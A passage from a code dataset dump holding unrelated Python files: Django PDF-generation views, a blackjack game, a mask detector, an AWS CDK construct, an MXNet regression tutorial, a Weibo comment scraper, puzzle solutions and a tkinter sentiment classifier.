format=\"md\",\n # outputfile=os.path.join(\n # latex_dir,\n # t.with_suffix('.tex').name),\n extra_args=self.extra_args,\n filters=self.filters,\n )\n latex = re.sub(r\"\\\\includegraphics(\\[.*\\]){/media\", r\"\\includegraphics\\1{media\", latex)\n except Exception as e:\n r[t.name] = \"Error during pandoc conversion: {}\".format(e.__str__())\n latex = \"ERROR\"\n\n output_file = os.path.join(\n self.latex_dir,\n t.with_suffix('.tex').name)\n # print(output_file)\n with open(output_file,\n \"w\") as fp:\n fp.write(latex)\n\n\n return {'results': r}\n\n def entrypoint(self, **kwargs):\n self.get_settings()\n r = self.run_pandoc()\n return r\n \nclass RunPdflatex(ExecutionView):\n\n template_name = \"pdf.html\"\n\n def get_settings(self):\n self.produced_dir = proposal.models.Setting.get_default('dirs', 'producedmedia')\n self.latex_dir = proposal.models.Setting.get_default('dirs', 'latex')\n self.uploaded_dir = proposal.models.Setting.get_default('dirs', 'uploaded')\n self.templates_dir = proposal.models.Setting.get_default('dirs', 'templates')\n self.tarball = proposal.models.Setting.get_default('dirs', 'tarball')\n\n def 
runcommand(self, *args):\n r = {'warning': '', 'result': None, 'exception': '',}\n print(list(args))\n try:\n compProc = subprocess.run(\n list(args),\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=self.latex_dir,\n )\n\n r['result'] = {'stdout': compProc.stdout, 'stderr': compProc.stderr, 'returncode': compProc.returncode}\n\n except Exception as e:\n r['exception'] += e.__str__()\n return r\n\n def bibtex(self, template):\n return self.runcommand('bibtex', template.name[:-4])\n\n def pdflatex(self, template):\n \"\"\"Run pdflatex once on given template\"\"\"\n return self.runcommand('pdflatex', template.name, '-interaction=nonstopmode')\n\n\n def pdflatex_template(self, template):\n\n r = {'obj': {'id': template.id, 'name': template.name}, 'warning': '', 'result': 'ok'}\n\n if not template.startpoint:\n r['warning'] += \"This template is NOT a startpoint. Unlikely to produce useful results!\"\n\n if not template.name.endswith('.tex'):\n r['warning'] += (\"You are trying to run pdflatex on a non-latex template.\"\n \"This is highly unlikely to produce useful results.\")\n else:\n r['pdf'] = template.name[:-4]+\".pdf\"\n\n if 'pdf' in r:\n # TODO: check that file exists, but it should...\n\n r.update({'run1': self.pdflatex(template)})\n r.update({'bibtex': self.bibtex(template)})\n # r.update({'run2': self.pdflatex(template)})\n # r.update({'run3': self.pdflatex(template)})\n if not os.path.isfile(os.path.join(self.latex_dir, r['pdf'])):\n r['result'] = 'no file generated'\n else:\n r['result'] = 'error'\n\n return r\n\n def link_pdf(self):\n latex_dir = pathlib.Path(self.latex_dir)\n # create symbolic links from media directory to latex dir\n # for produced PDFs\n\n for d in list(latex_dir.glob('*.pdf')):\n print(d)\n try:\n shutil.copy2(d.as_posix(), self.produced_dir)\n except FileExistsError as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n\n def produce_tarball(self):\n\n with tarfile.open(self.tarball, \"w:gz\") as tarfp:\n tarfp.add(self.latex_dir)\n tarfp.add(self.templates_dir)\n tarfp.add(self.uploaded_dir)\n\n\n\n\n def entrypoint(self, **kwargs):\n self.get_settings()\n\n pk = kwargs.pop('pk', None)\n print(pk)\n result = {}\n\n if pk:\n startfiles = [get_object_or_404(proposal.models.Template,\n pk=pk)]\n else:\n startfiles = get_list_or_404(proposal.models.Template,\n startpoint=True)\n\n print(startfiles)\n\n # go to the right directory; do that once for all templates\n\n # produce all pdfs\n result['startfiles'] = [self.pdflatex_template(s)\n for s in startfiles]\n\n self.link_pdf()\n self.produce_tarball()\n\n return result\n\n\nclass getNewPdf(RedirectView):\n\n url = \"/\" + proposal.models.Setting.get_default('dirs', 'producedmedia')\n\n def get_redirect_url(self, *args, **kwargs):\n print(\"In getNewPdf\")\n\n filename = kwargs.get('filename', None)\n if filename:\n template_name = re.sub('.pdf$', '.tex', filename)\n template = get_object_or_404(\n proposal.models.Template,\n name__startswith=template_name,\n startpoint=True\n )\n\n print(\"filename: \", filename, template)\n\n r = {}\n r.update(ExecuteTemplates().entrypoint(**kwargs))\n r.update(CreateLatex().entrypoint(**kwargs))\n r.update(RunPdflatex().entrypoint(pk=template.pk,\n **kwargs))\n\n # TODO: error checking!\n\n # redir = super().get_redirect_url(url = \"/blasdsja\", *args, **kwargs)\n redir = self.url + \"/\" + filename\n print(\"redirecting: \", redir)\n return 
redir","repo_name":"hkarl/django_propgen","sub_path":"django/proposal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11462479332","text":"from time import sleep\n\nfrom pycardgame import Deck, PlayerHand, BlackJackRules\n\nblack_jack_symbols = BlackJackRules.SYMBOLS_NAMES\nblack_jack_names = BlackJackRules.NAMES\nblack_jack_win = BlackJackRules.SCORE_WIN\nblack_jack_dealer_score_limit = BlackJackRules.SCORE_DEALER_LIMIT\n\n\ndef main():\n black_jack = Deck(black_jack_symbols, black_jack_names, shake=True, quantity=2)\n while True:\n dealer_hand = PlayerHand()\n player_hand = PlayerHand()\n turn = ''\n print('Card game Black Jack!')\n input('Click Enter for start...')\n dealer_hand.add_card(black_jack.deck_of_cards[0])\n player_hand.add_card(black_jack.deck_of_cards[1])\n dealer_hand.add_card(black_jack.deck_of_cards[2])\n player_hand.add_card(black_jack.deck_of_cards[3])\n del black_jack.deck_of_cards[:4]\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n while turn.lower() != 'stand':\n turn = input('Your turn (Stand/Hit)... ')\n if turn.lower() == 'hit':\n if player_hand.score() < black_jack_win:\n player_hand.add_card(black_jack.deck_of_cards[0])\n del black_jack.deck_of_cards[0]\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n if player_hand.score() > black_jack_win:\n print('You lost =(')\n break\n if player_hand.score() == black_jack_win:\n print(f'Your hand: {player_hand}')\n print(f'Your score: {player_hand.score()}')\n print('Congratulations you win!!!')\n break\n\n if turn.lower() == 'stand':\n print(f'Dealer thinking', end='')\n for i in range(3):\n print('.', end='')\n sleep(0.5)\n while dealer_hand.score() < black_jack_dealer_score_limit:\n dealer_hand.add_card(black_jack.deck_of_cards[0])\n del black_jack.deck_of_cards[0]\n print(f'\\nDealer hand: {dealer_hand}')\n print(f'Dealer score: {dealer_hand.score()}')\n if dealer_hand.score() > black_jack_win:\n print('Dealer lost. 
Congratulations you win!!!')\n elif player_hand.score() >= dealer_hand.score():\n print('Congratulations you win!!!')\n else:\n print('You lost =(')\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Minat004/pyBlackJack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7693676422","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.camera import Camera\nfrom kivy.clock import Clock\nfrom kivy.uix.image import Image\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array # Ajout de cette ligne\nfrom keras.applications.mobilenet_v2 import preprocess_input\n\nimport os\n\n\n# Obtenez le chemin absolu du répertoire de données de votre application\ndata_dir = os.path.abspath(\"face_detector\")\n\n# Utilisez des chemins relatifs depuis le répertoire de données\nfaceNet = cv2.dnn.readNet(os.path.join(data_dir, \"deploy.prototxt\"), os.path.join(data_dir, \"res10_300x300_ssd_iter_140000.caffemodel\"))\nmaskNet = load_model(\"mask_detector.model\")\n\nclass MaskDetectionApp(App):\n def build(self):\n self.camera = Camera(play=True)\n self.camera.resolution = (640, 480)\n self.layout = BoxLayout(orientation=\"vertical\")\n self.layout.add_widget(self.camera)\n self.result_label = Label(text=\"Mask: Unknown\", font_size=24)\n self.layout.add_widget(self.result_label)\n self.capture = None\n Clock.schedule_interval(self.update, 1.0 / 30)\n return self.layout\n\n def update(self, dt):\n frame = self.camera.texture\n if frame:\n data = frame.pixels\n data = np.frombuffer(data, dtype=np.uint8)\n frame = data.reshape(frame.height, frame.width, 4)\n frame = cv2.cvtColor(frame, cv2.COLOR_RGBA2BGR)\n\n # Perform face mask detection here (use your detect_and_predict_mask function)\n (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet)\n label = \"Masque:détecté\"\n if len(locs) > 0:\n (mask, withoutMask) = preds[0]\n label = \"Masque detecté\" if mask > withoutMask else \"masque non detecté\"\n label = f\"Masque: {label} ({max(mask, withoutMask) * 100:.2f}%)\"\n self.result_label.text = label\n\ndef detect_and_predict_mask(frame, faceNet, maskNet):\n # grab the dimensions of the frame and then construct a blob\n # from it\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (104.0, 177.0, 123.0))\n\n # pass the blob through the network and obtain the face detections\n faceNet.setInput(blob)\n detections = faceNet.forward()\n print(detections.shape)\n\n # initialize our list of faces, their corresponding locations,\n # and the list of predictions from our face mask network\n faces = []\n locs = []\n preds = []\n\n # loop over the detections\n for i in range(0, detections.shape[2]):\n # extract the confidence (i.e., probability) associated with\n # the detection\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections by ensuring the confidence is\n # greater than the minimum confidence\n if confidence > 0.5:\n # compute the (x, y)-coordinates of the bounding box for\n # the object\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # ensure the bounding boxes fall within the dimensions of\n # the frame\n (startX, startY) = (max(0, startX), max(0, startY))\n (endX, endY) = (min(w - 1, endX), min(h - 1, 
endY))\n\n # extract the face ROI, convert it from BGR to RGB channel\n # ordering, resize it to 224x224, and preprocess it\n face = frame[startY:endY, startX:endX]\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n face = cv2.resize(face, (224, 224))\n face = img_to_array(face)\n face = preprocess_input(face)\n\n # add the face and bounding boxes to their respective\n # lists\n faces.append(face)\n locs.append((startX, startY, endX, endY))\n\n # only make a prediction if at least one face was detected\n if len(faces) > 0:\n # for faster inference we'll make batch predictions on all\n # faces at the same time rather than one-by-one predictions\n # in the above for loop\n faces = np.array(faces, dtype=\"float32\")\n preds = maskNet.predict(faces, batch_size=32)\n\n # return a 2-tuple of the face locations and their corresponding\n # locations\n return (locs, preds)\n\nif __name__ == '__main__':\n MaskDetectionApp().run()\n","repo_name":"sergetanoh/face_mask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70102662328","text":"from os import path as opath, remove\nimport hashlib\nfrom typing import TypeVar, Callable, AnyStr\n\nT = TypeVar(\"T\")\n\n\nclass File:\n path: str\n name: str\n ext: str\n identity: str\n\n def __init__(self, path: str):\n if not opath.exists(path):\n raise Exception('File {} does not exist!'.format(path))\n if not opath.isfile(path):\n raise Exception('File {} is not actually a file!'.format(path))\n\n self.path = path\n name, ext = opath.splitext(opath.basename(path))\n self.name = name\n self.ext = ext\n self.identity = self.calculate_identity()\n\n def chunk_reducer(self, reducer: Callable[[T, AnyStr | str | bytes], T], init: T, chunk_size: int = 65536) -> T:\n next_iter: T = init\n with open(self.path, 'rb') as file:\n chunk: AnyStr | str | bytes = b'?'\n while chunk:\n chunk = file.read(chunk_size)\n next_iter = reducer(next_iter, chunk)\n return next_iter\n\n def file_hash(self, hash_function) -> str:\n reduced = self.chunk_reducer( # type: ignore\n reducer=hash_reducer,\n init=hash_function\n )\n return reduced.hexdigest()\n\n def sha1(self):\n return self.file_hash(hashlib.sha1())\n\n def md5(self):\n return self.file_hash(hashlib.md5())\n\n def calculate_identity(self):\n return '{}.{}'.format(self.md5(), self.sha1())\n\n def delete(self):\n remove(self.path)\n\n\ndef hash_reducer(hasher, chunk):\n hasher.update(chunk)\n return hasher\n","repo_name":"GaussianWonder/drum-classifier","sub_path":"ai/files/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23855293192","text":"from aws_cdk import (\n aws_lambda as _lambda,\n aws_lambda_python as _lambda_python,\n aws_apigatewayv2 as apigw,\n aws_apigatewayv2_integrations as apigw_int,\n aws_dynamodb as ddb,\n aws_logs as log,\n core\n)\n\nclass AddBluePrintVersion(core.Construct):\n\n def __init__(self, scope: core.Construct, id: str, api: apigw.HttpApi, table: ddb.Table, **kwargs):\n super().__init__(scope, id, **kwargs)\n\n addBluePrintVersion = _lambda_python.PythonFunction(\n self, 'addBluePrintVersion',\n entry='lambda/addBluePrintVersion',\n index='addBluePrintVersion.py',\n runtime=_lambda.Runtime.PYTHON_3_8, \n environment={\n 'TABLE_NAME': table.table_name\n },\n log_retention=log.RetentionDays.ONE_DAY,\n 
tracing=_lambda.Tracing.ACTIVE,\n )\n\n table.grant_read_write_data(addBluePrintVersion)\n\n updateBluePrintInt = apigw_int.LambdaProxyIntegration(\n handler=addBluePrintVersion\n )\n\n api.add_routes(\n path='/admin/blueprint',\n methods=[apigw.HttpMethod.PUT],\n integration=updateBluePrintInt\n )","repo_name":"photosojourn/vendy","sub_path":"vendy/addBluePrintVersion.py","file_name":"addBluePrintVersion.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43402501061","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'tobin'\n\nimport math\nimport numpy as np\n\ndef real_position(size, image_pos, camera_para, camera_rot, camera_pos):\n T = position_matrix(camera_pos)\n R = rotation_matrix(camera_rot)\n fx, fy = camera_para\n xp, yp = image_pos\n width, height = size\n\n # perspective camera point\n xc = (xp - width / 2) / fx\n yc = (yp - height / 2) / fy\n\n # coordinate transformation point\n zr = 0.915348425339\n xr = xc * zr\n yr = yc * zr\n\n # Vt = R'Vr\n Vr = np.array([[xr, yr, zr, 1.0]])\n Vr = np.transpose(Vr)\n Vt = np.dot(np.linalg.inv(R), Vr)\n # Vo = T'Vt\n Vo = np.dot(np.linalg.inv(T), Vt)\n\n xo, yo, zo, _ = tuple(row[0] for row in Vo)\n return (xo, yo, zo)\n\ndef inner_parameter(size, image_pos, camera_rot, camera_pos, refer_pos):\n xo, yo, zo = refer_pos\n T = position_matrix(camera_pos)\n R = rotation_matrix(camera_rot)\n xp, yp = image_pos\n width, height = size\n\n # scene point\n Vo = np.array([[xo, yo, zo, 1.0]])\n Vo = np.transpose(Vo)\n # Vt = TVo\n Vt = np.dot(T, Vo)\n # Vr = RVt\n Vr = np.dot(R, Vt)\n\n # coordinate transformation point\n xr, yr, zr, _ = tuple(row[0] for row in Vr)\n\n # perspective camera point\n xc, yc = xr / zr, yr / zr\n\n # inner parameter\n fx = (xp - width / 2) / xc\n fy = (yp - height / 2) / yc\n\n return (fx, fy)\n\ndef rotation_matrix(camera_rot):\n alpha, beta, gama = camera_rot\n\n sin_alpha = math.sin(alpha)\n cos_alpha = math.cos(alpha)\n\n sin_beta = math.sin(beta)\n cos_beta = math.cos(beta)\n\n sin_gama = math.sin(gama)\n cos_gama = math.cos(gama)\n\n R = np.array([[cos_beta * cos_gama,\n cos_beta * sin_gama,\n -sin_beta,\n 0.0],\n [sin_alpha * sin_beta * cos_gama - cos_alpha * sin_gama,\n sin_alpha * sin_beta * sin_gama + cos_alpha * cos_gama,\n sin_alpha * cos_beta,\n 0.0],\n [cos_alpha * sin_beta * cos_gama + sin_alpha * sin_gama,\n cos_alpha * sin_beta * sin_gama - sin_alpha * cos_gama,\n cos_alpha * cos_beta,\n 0.0],\n [0.0, 0.0, 0.0, 1.0]])\n return R\n\ndef position_matrix(camera_pos):\n x, y, z = camera_pos\n T = np.array([[1.0, 0.0, 0.0, -x],\n [0.0, 1.0, 0.0, -y],\n [0.0, 0.0, 1.0, -z],\n [0.0, 0.0, 0.0, 1.0]])\n\n return T","repo_name":"skyczhao/silver","sub_path":"Road/test/ipm/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13891162087","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 29 20:42:59 2018\n\n@author: Taylor\n\"\"\"\n\n# Building linear regression with gluon api\n\n\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nmx.random.seed(1)\n\ndata_ctx = mx.cpu()\nmodel_ctx = mx.cpu()\n\n\nnum_inputs = 2\nnum_outputs = 1\nnum_examples = 10000\n\ndef real_fn(X):\n return 2 * X[:, 0] - 3.4 * X[:, 1] + 4.2\n\n\n# what are the defaults for loc and scale? 
0 and 1?\n# is the comma in shape of noise necessary?\n# do we need to define the context for these?\nX = nd.random_normal(shape=(num_examples, num_inputs))\nnoise = nd.random_normal(shape=(num_examples,))\ny = real_fn(X) + noise\n\nprint(X.shape)\nprint(noise.shape)\n\n# did we need to specify the data context?\nprint(X.context)\nprint(noise.context)\n\n\n# set up data array and data loader\nbatch_size = 4\narray_dataset = gluon.data.ArrayDataset(X, y)\ntrain_data = gluon.data.DataLoader(array_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n# Now this is where we'll use gluon instead of raw MXNEt\n\n# ?gluon.nn.Dense\n# units is dimensionality of output space\n# in_units is shape/size of input space\n# in_units will be inferred on first forward pass\n# if left blank\nnet = gluon.nn.Dense(1, in_units=2)\n\n# weights and bias are set up for us magically!\nprint(net.weight)\nprint(net.bias)\n\n\n# we can collect all of the parameters of the network like this\nnet.collect_params()\n\n# this returns a dictionary of the parameters (key-value pairs)\ntype(net.collect_params())\n\n# it is important to note that parameters haven't been\n# initialized yet. They just have a place in memory and \n# that is all.\n\n# if we try invoking the model, we'll get an error\nnet(nd.array([[0, 1]]))\n\n\n# we haven't told gluon what the initial values for the \n# parameters should be\n\nnet.collect_params().initialize(mx.init.Normal(sigma=1.), ctx=model_ctx)\n\n# paremeters have now been given an initializer, BUT the\n# network won't actually initialize values for them until\n# the network is called to make a forward pass.\nnet.weight.data()\nnet.bias.data()\n\n# I don't think these above commands were supposed to work\n# but they did...\n\n\n# notice the difference between these manually generated NDArrays\nnd.array([4, 7]).shape # (2,)\nnd.array([[4, 7]]).shape # (1,2)\n\n# the second one from above is what we need to pass data through the model\n# this is just an example of a simple forward pass...\nexample_data = nd.array([[4, 7]])\nnet(example_data) \n# you just call the net like it's a function and it will\n# assume you want to execute a forward pass with that data\n\n# Now we can accss these values (even though we technically could before...)\nprint(net.weight.data())\nprint(net.bias.data())\n\n\n# we didn't have to specify the input shape of this dense network...\n# let's see what that would look like to let gluon infer that info\nnet = gluon.nn.Dense(1)\nnet.collect_params().initialize(mx.init.Normal(sigma=1.), ctx=model_ctx)\n\n\n# define the loss we want to use..\nsquare_loss = gluon.loss.L2Loss()\n# L2 is most common (squared error basically)\n# L1 is next most common (more robust against outliers - absolute error)\n\n\n# optimizer - we don't have to write our own stochastic gradient\n# descent function - just assign it to a gluon.Trainer\n# ?gluon.Trainer\n# http://mxnet.io/api/python/optimization/optimization.html#the-mxnet-optimizer-package\n\nopti_params = {'learning_rate': 0.0001}\ntrainer = gluon.Trainer(params=net.collect_params(), \n optimizer='sgd',\n optimizer_params=opti_params)\n\n# ?trainer.step - just takes batch_size\n\n\n# set up other hyper parameters for training loop\nepochs = 10\nloss_sequence = []\nnum_batches = num_examples / batch_size\n\nfor e in range(epochs):\n cumulative_loss = 0\n #inner loop\n # this for loop below will run the whole data set\n # every time (epoch)\n # it will run 2500 batches of 4 observations (10,000 total)\n for i, (data, label) in 
enumerate(train_data):\n data = data.as_in_context(model_ctx)\n label = label.as_in_context(model_ctx)\n # record the forward pass and loss calc so we can back prop\n with autograd.record():\n output = net(data)\n loss = square_loss(output, label)\n loss.backward() # this updates parameter gradients\n trainer.step(batch_size)\n # if you don't do asscalar, you'll get an NDArray instead...\n cumulative_loss += nd.mean(loss).asscalar()\n print(\"Epoch %s, loss: %s\" % (e, cumulative_loss / num_batches))\n loss_sequence.append(cumulative_loss)\n\n\nimport matplotlib.pyplot as plt\n\nplt.figure(num=None, figsize=(8,6))\nplt.plot(loss_sequence)\n\n# adding some bells and whistles\nplt.grid(True, which=\"both\")\nplt.xlabel('epoch', fontsize=14)\nplt.ylabel('average loss', fontsize=14)\n\n\nloss_sequence\n\n\n\n# accessing the learned parameters (weights / biases)\nparams = net.collect_params()\n\nprint('The type of \"params\" is a ', type(params))\ntype(params.values())\nprint(params.values())\n\nfor param in params.values():\n print(param.name, param.data())\n\n\n\n\n\n\"\"\"\nNotes:\n \n 1. start with your data you want to train on\n 2. build your DataLoader with a ArrayData - this will\n define the batch size of your data so you can use\n the enumerate() function to capture the correct\n number of X/y observations during training\n 3. build the network with # inputs / # outputs and\n the number of layers desired\n 4. set up the initializer for parameters\n .collect_params().initialize(mx.init.Normal(1.), context=)\n 5. set up the loss function: gluon.loss.L2loss\n 6. set up the trainer/learner/optimizer\n gluon.Trainer(params, optimizer, optimizer_params):\n 1. the params are the output of .collect_params()\n 2. the optimizer is a character string representing the algo ('sgd')\n 3. the optimizer params are parameters for the optimize algo (learning rate)\n 7. set up the training loop:\n 1. loop through each epoch\n 2. enumerate the DataLoader and move data/label into model context\n 3. begin recording for autograd\n 4. forward pass + loss calculation\n 5. OUTSIDE OF RECORDING - .backward()\n 6. 
Trainer.step - pass in the batch size for proper step\n\"\"\"\n\n\n\n","repo_name":"tjvananne/gluon_mxnet_learning","sub_path":"the_straight_dope/basics/05_linear_regression_with_gluon.py","file_name":"05_linear_regression_with_gluon.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74535208249","text":"def solution(answers):\n answer = []\n\n fst = 0\n sec = 0\n thr = 0\n\n # answer patterns that students 2 and 3 repeat\n secAns = [1, 3, 4, 5]\n thrAns = [3, 1, 2, 4, 5]\n\n for i, n in enumerate(answers):\n\n # student 1 repeats 1,2,3,4,5\n if n == i % 5 + 1:\n fst += 1\n\n # student 2 repeats 2,1,2,3,2,4,2,5: 2 on even positions,\n # secAns cycling on odd positions\n if 0 == (i % 2) and n == 2:\n sec += 1\n elif i % 2 and n == secAns[int(i/2) % 4]:\n sec += 1\n\n # student 3 repeats 3,3,1,1,2,2,4,4,5,5: thrAns in pairs\n if n == thrAns[int(i / 2) % 5]:\n thr += 1\n\n print(fst, sec, thr)\n\n # return the (1-indexed) students who scored the most\n best = max(fst, sec, thr)\n for student, score in enumerate((fst, sec, thr), start=1):\n if score == best:\n answer.append(student)\n\n return answer\n\n\nprint(solution([1,3,2,4,2]))\n\n\n","repo_name":"IhnoH/AlgorithmSolve","sub_path":"PROG_mathRotate.py","file_name":"PROG_mathRotate.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6693367570","text":"from pathlib import Path\n\ndef solveA(data):\n return sum(int(val) for cmd, val in map(str.split, data) if cmd == 'forward') * \\\n sum(int(val) * ((cmd == 'down') - (cmd == 'up')) for cmd, val in map(str.split, data))\n\ndef solveB(data):\n x, y, aim = 0, 0, 0\n for cmd, val in map(str.split, data):\n v = int(val)\n if cmd == 'forward': x, y = x + v, y + v * aim\n elif cmd == 'down': aim += v\n elif cmd == 'up': aim -= v\n return x * y\n\ndef main():\n sampleData = 'forward 5,down 5,forward 8,up 3,down 8,forward 2'.split(',')\n print(solveA(sampleData))\n print(solveB(sampleData))\n\n p = Path(__file__).with_name('input2.txt')\n with p.open('r') as f:\n data = f.readlines()\n print(solveA(data))\n print(solveB(data))\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarcusLassila/AoC-2021","sub_path":"Day2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8307219738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 28 16:46:19 2017\n\n@author: dell\n\"\"\"\n# dynamic loading\nimport requests\nimport re\nimport time\n\nii = 10\nwhile ii <= 20:\n ii = ii + 1\n url = 'https://m.weibo.cn/api/comments/show?id=4188633986790962&page=' + str(ii)\n time.sleep(3)\n html = requests.get(url)\n try:\n for jj in range(len(html.json()['data']['data'])):\n data = html.json()['data']['data'][jj]['text']\n with open('weibo.txt', 'a') as ff:\n hanzi = ''.join(re.findall('[\\u4e00-\\u9fa5]', data))\n #print(hanzi)\n ff.write(hanzi + '\\n')\n except Exception:\n pass\n \n \n","repo_name":"eshinesimida/weibo","sub_path":"weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"41254853409","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# tkinter for the GUI\r\nimport tkinter as tk\r\nfrom tkinter import Tk, scrolledtext, Label, W, S, E, N, Button, END, Frame, Entry\r\nfrom tkinter.scrolledtext import ScrolledText\r\n\r\nimport random\r\n\r\n\r\nclass Prototype(Frame):\r\n # for the regression\r\n vectorizer = CountVectorizer()\r\n classifier = LogisticRegression()\r\n\r\n 
instruction_label = Label()\r\n text_frame = ScrolledText()\r\n process_btn = Button()\r\n generate_eval = Button()\r\n doc_entry = Entry()\r\n predicted_label = Label()\r\n predicted_result = Label()\r\n result_description = Label()\r\n\r\n\r\n def __init__(self, master=None):\r\n\r\n super(Prototype, self).__init__()\r\n\r\n self.master = master\r\n self.master.title('App')\r\n self.master.geometry('570x200')\r\n \r\n\r\n # labels\r\n self.instruction_label = Label(self.master, text=\"Inserte un texto para analizar: \")\r\n self.instruction_label.grid(row=0, sticky=W)\r\n\r\n # input\r\n self.text_frame = ScrolledText(self.master, width=45,height=3)\r\n self.text_frame.grid(column=1,row=0)\r\n\r\n # button\r\n self.process_btn = Button(self.master, text =\"Test Microblog\", command = self.test_expression)\r\n self.process_btn.grid(row=1, column =1)\r\n\r\n # charge the predictive model using the data provided\r\n self.generate_eval = Button(self.master, text =\"Load Predictive model\", command = self.load_model)\r\n self.generate_eval.grid(row=2, column =0)\r\n\r\n\r\n # add an entry with the value of the document thats used for changig the data\r\n self.doc_entry = Entry(self.master)\r\n self.doc_entry.grid(row=1, column=0)\r\n self.doc_entry.insert(END, 'prototipo_tweets.csv')\r\n\r\n # add a label for the prediction\r\n self.predicted_label = Label(self.master, text=\"Prediccion: \")\r\n self.predicted_label.grid(row=3, column = 1)\r\n\r\n # add a label for the prediction text\r\n self.predicted_result = Label(self.master, text=\"0\")\r\n self.predicted_result.grid(row=3, column = 2)\r\n\r\n # add a label for the result drescription\r\n self.result_description = Label(self.master, text=\"For purposes of this program 1 is :( and 0 is :)\")\r\n self.result_description.grid(row=4, column = 1)\r\n\r\n def test_expression(self):\r\n self.introduced_text = self.text_frame.get('1.0', END)\r\n # print(self.introduced_text)\r\n\r\n test_string = [self.introduced_text]\r\n # # vectorize\r\n test_string = self.vectorizer.transform(test_string)\r\n\r\n score2 = self.classifier.predict(test_string)\r\n\r\n # print(\"Test Acc: \", score2)\r\n self.predicted_result.configure(text = score2)\r\n # self.predicted_result.configure(text = random.randint(0,1))\r\n\r\n def load_model(self):\r\n df = pd.read_csv('prototipo_tweets.csv')\r\n\r\n text = df['text'].values\r\n y = df['sentiment'].values\r\n\r\n sentences_train, sentences_test, y_train, y_test = train_test_split(text, y, test_size=0.25, random_state=1000)\r\n\r\n \r\n self.vectorizer.fit(sentences_train)\r\n\r\n X_train = self.vectorizer.transform(sentences_train)\r\n X_test = self.vectorizer.transform(sentences_test)\r\n # print(X_train)\r\n\r\n self.classifier.fit(X_train, y_train)\r\n score = self.classifier.score(X_test, y_test)\r\n\r\n print(\"Current Accuracy: \", score)\r\n\r\n\r\n\r\nroot = tk.Tk()\r\n\r\nproto = Prototype(root)\r\n\r\nproto.mainloop()\r\n\r\n\r\n# df = pd.read_csv('prototipo_tweets.csv')\r\n\r\n# # print(df.iloc[0])\r\n\r\n# text = df['text'].values\r\n# y = df['sentiment'].values\r\n\r\n# sentences_train, sentences_test, y_train, y_test = train_test_split(text, y, test_size=0.25, random_state=1000)\r\n\r\n# vectorizer = CountVectorizer()\r\n# vectorizer.fit(sentences_train)\r\n\r\n# X_train = vectorizer.transform(sentences_train)\r\n# X_test = vectorizer.transform(sentences_test)\r\n# # print(X_train)\r\n\r\n# classifier = LogisticRegression()\r\n# classifier.fit(X_train, y_train)\r\n# score = classifier.score(X_test, 
